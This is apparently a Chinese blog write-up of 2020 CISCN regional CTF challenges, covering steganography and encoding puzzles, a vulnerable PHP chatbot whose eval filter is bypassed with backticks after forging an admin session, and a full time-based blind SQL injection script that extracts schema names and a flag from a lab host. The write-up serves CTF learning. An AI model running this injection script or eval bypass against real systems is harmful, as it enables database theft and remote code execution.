携手创作，共同成长！这是我参与「掘金日新计划 · 8 月更文挑战」的第14天，点击查看活动详情

pikachu

stegsolve查看发现lsb隐写，红蓝绿通道有加密字符串，这里用seteg一把梭应该也可以

cGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYSBwaXBpIHBpIHBpcGkgcGkgcGkgcGkgcGlwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaXBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpY2h1IHBpY2h1IHBpY2h1IHBpY2h1IGthIGNodSBwaXBpIHBpcGkgcGlwaSBwaXBpIHBpIHBpIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpY2h1IGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIGthIHBpa2FjaHUga2Ega2Ega2Ega2EgcGlrYWNodSBwaSBwaSBwaWthY2h1IHBpIHBpIHBpa2FjaHUgcGlwaSBwaWthY2h1IHBpY2h1IGthIGthIGthIGthIGthIHBpa2FjaHUgcGlwaSBwaSBwaSBwaWthY2h1IHBpY2h1IHBpIHBpIHBpIHBpa2FjaHUga2Ega2Ega2EgcGlrYWNodSBwaXBpIHBpa2FjaHUga2Ega2Ega2Ega2Ega2EgcGlrYWNodSBwaSBwaSBwaSBwaWthY2h1IHBpY2h1IGthIHBpa2FjaHUgcGkgcGkgcGkgcGlrYWNodSBrYSBwaWthY2h1IHBpcGkgcGkgcGlrYWNodSBwaWthY2h1IHBpY2h1IHBpIHBpa2FjaHUga2Ega2Ega2EgcGlrYWNodSBwaSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUga2Ega2Ega2Ega2Ega2Ega2EgcGlrYWNodSBwaXBpIHBpIHBpa2FjaHUgcGljaHUgcGlrYWNodSBwaXBpIGthIGthIGthIGthIGthIHBpa2FjaHUgcGkgcGkgcGkgcGkgcGkgcGlrYWNodSBwaWNodSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpa2FjaHUga2EgcGlrYWNodSBrYSBrYSBrYSBrYSBwaWthY2h1IHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpIHBpa2FjaHUgcGlwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaSBwaWthY2h1IA==

感觉像base64,我们用解码工具解码一下。

pi pi pi pi pi pi pi pi pi pi pika pipi pi pipi pi pi pi pipi pi pi pi pi pi pi pi pipi pi pi pi pi pi pi pi pi pi pi pichu pichu pichu pichu ka chu pipi pipi pipi pipi pi pi pikachu pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka pikachu pi pi pi pi pi pi pikachu pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu pichu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu ka ka ka ka pikachu pi pi pikachu pi pi pikachu pipi pikachu pichu ka ka ka ka ka pikachu pipi pi pi pikachu pichu pi pi pi pikachu ka ka ka pikachu pipi pikachu ka ka ka ka ka pikachu pi pi pi pikachu pichu ka pikachu pi pi pi pikachu ka pikachu pipi pi pikachu pikachu pichu pi pikachu ka ka ka pikachu pi pikachu pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka pikachu pipi pi pikachu pichu pikachu pipi ka ka ka ka ka pikachu pi pi pi pi pi pikachu pichu ka ka pikachu pi pi pi pi pikachu ka pikachu ka ka ka ka pikachu pi pi pi pi pi pi pi pi pikachu pipi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu

根据以往的经验判断为(pi ka chu)编码，我们找个专门的网站进行解码。

www.dcode.fr/pikalang-la…

snowberg

010看下发现进去就出现了crc错报，我们查看数据块，发现了看有加密字符串aes，需要我们进行解密

U2FsdGVkX1+mMxrc0YkGvTaB0c3A9EgFWvjghqa8j+J4vs0SO8q4qXO+OfKOIih+zOwLBe64L23McubUTe1dxA==

但没有密钥解不开

之后zsteg发现lsb隐写，提取出来有个压缩包，save bin

4个文件，需要密码

做过类似题的我们就可以进行CRC32爆破（详细可以看看我之前的文章）

脚本地址

github.com/theonlypwne…

挨个爆破得到key

y0u_f0und_th1s_k3y

我们将AES与密钥解码就行

old

base-rot13-W型栅栏3栏

根据这个步骤一步一步的进行解码就可以了，也可以使用工具来解。

welcomeToCiscn

F12源码查看flag,在/flag目录里面就会发现由字符块组成的flag，需要注意大小写。

会聊天的ctf机器人

image任意文件读读api.php源码

```php<?phpinit();function init(){    $sesspath = "/tmp/session";    session_save_path($sesspath);    session_start();    if (!$_SESSION['cname'])        $_SESSION['cname'] = 'ck';    if(!file_dir_exists("/tmp/resource"))        mkdir("/tmp/resource");}
function file_dir_exists($path){    $dir = dir($path);    if ($dir)        if ($dir->read())            return true;    return is_file($path);}
function getres($input){    log_write($input);    chdir("/tmp/resource/");    $path = $_SESSION['cname'];    if(!file_dir_exists($path)){        return "è¯·å…ˆä¸Šä¼ è¯åº“æ–‡ä»¶ã€‚";    }    $ck = json_decode(file_get_contents($path),true);    foreach ($ck as $key => $value){        if (strstr($key,$input) or strstr($input,$key)){            $type = key($value);            $v = $value[$type];            switch ($type){                case "string":                    return $v;                case "image":                    $b64img = '<img src="data:image/png;base64,'.base64_encode(file_get_contents($v)) . '"/>';                    return $b64img;                case "calc":                    if ($_SESSION['is_admin']){                        if (preg_match("/(|)|'|"/im",$v)){                            return "åŒ…å«éžæ³•å—ç¬¦";                        }                        return eval("return $v;");                    }else{                        return "adminæ‰èƒ½ä½¿ç”¨è¿™ä¸ªåŠŸèƒ½";                    }                default:                    return "è¿™ä¸ªåŠ¨ä½œæš‚æ—¶è¿˜æ²¡èƒ½å®žçŽ°";            }
        }    }    return "æ²¡æœ‰åŒ¹é…åˆ°è¯åº“æ¶ˆæ¯";}
function uploadc(){    $data = $_POST['uploadc'];    $filename = $_POST['cname'];    $resourcedir = "/tmp/resource/";    if(!file_dir_exists($resourcedir))        mkdir($resourcedir);    if(strpos($data,"<")){        die("åˆ«è¿™æ ·ï¼");    }    if(strpos($filename,".")){        die("åˆ«è¿™æ ·ï¼");    }    $_SESSION['cname'] = $filename;    if(file_put_contents($resourcedir.$filename,$data)) {        return "ä¸Šä¼ æˆåŠŸ";    }else{        return "ä¸Šä¼ å¤±è´¥";    }}function log_write($msg){    $logpath = "log.txt";    $oper = session_id();    $opername = substr($oper,0,1) ;    for ($i=0;$i <= strlen($oper);$i++)        $opername .= "*";    file_put_contents($logpath,"$opername : $msg \n",FILE_APPEND);}
if(isset($_POST['input']))    echo getres($_POST['input']);if(isset($_POST['uploadc']))    echo uploadc();if(isset($_POST['clear']))    file_put_contents("log.txt","");if(isset($_GET['log']))echo file_get_contents("log.txt");

通过upload写session文件，获取admin权限

代码执行过滤了括号和引号直接反引号绕过

执行命令就可以了

ezsql

错报注入，没有任何过滤，注意字段当前数据库与本站数据库不同，需要反引号明确字段，否则不太行

import requests
url='http://192.168.166.131:58004/app/deleteaccount_status.php?account_status_number='
flag=''
for i in range(1,55):
    m=32
    n=127
    while 1:
        mid=(m+n)//2
        #payload="1'or if (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},sleep(1),0)%23".format(i,mid)#ctfshow_flagxc,ctfshow_info
        #mysql,information_schema,performance_schema,sys,mims,f0ig_wdp435s


        #payload="1'or if (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='f0ig_wdp435s'),{},1))<{},sleep(1),0)%23".format(i,mid)
        #account_status,account_type,accounts,customers,customers_sNpe,users


        #payload="1'or if (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='fllaaagggg'),{},1))<{},sleep(1),0)%23".format(i,mid)
        # FI@g


        payload="1'or if(ascii(substr((select `FI@g` from f0ig_wdp435s.fllaaagggg),{},1))<{},sleep(1),0)%23".format(i,mid)
        print(url+payload)
        try:
            r=requests.get(url=url+payload,timeout=2)
            m=mid
        except:
            n=mid
        if(m+1==n):
            flag+=chr(m)
            print(flag)
            break

用sqlmap直接跑可以看到字段名，之后就查不出来了，原因就是以上提到的，这里需要注意这一点。

2020CISCN华东北赛区部分题目复现

pikachu

snowberg

old

welcomeToCiscn

会聊天的ctf机器人

ezsql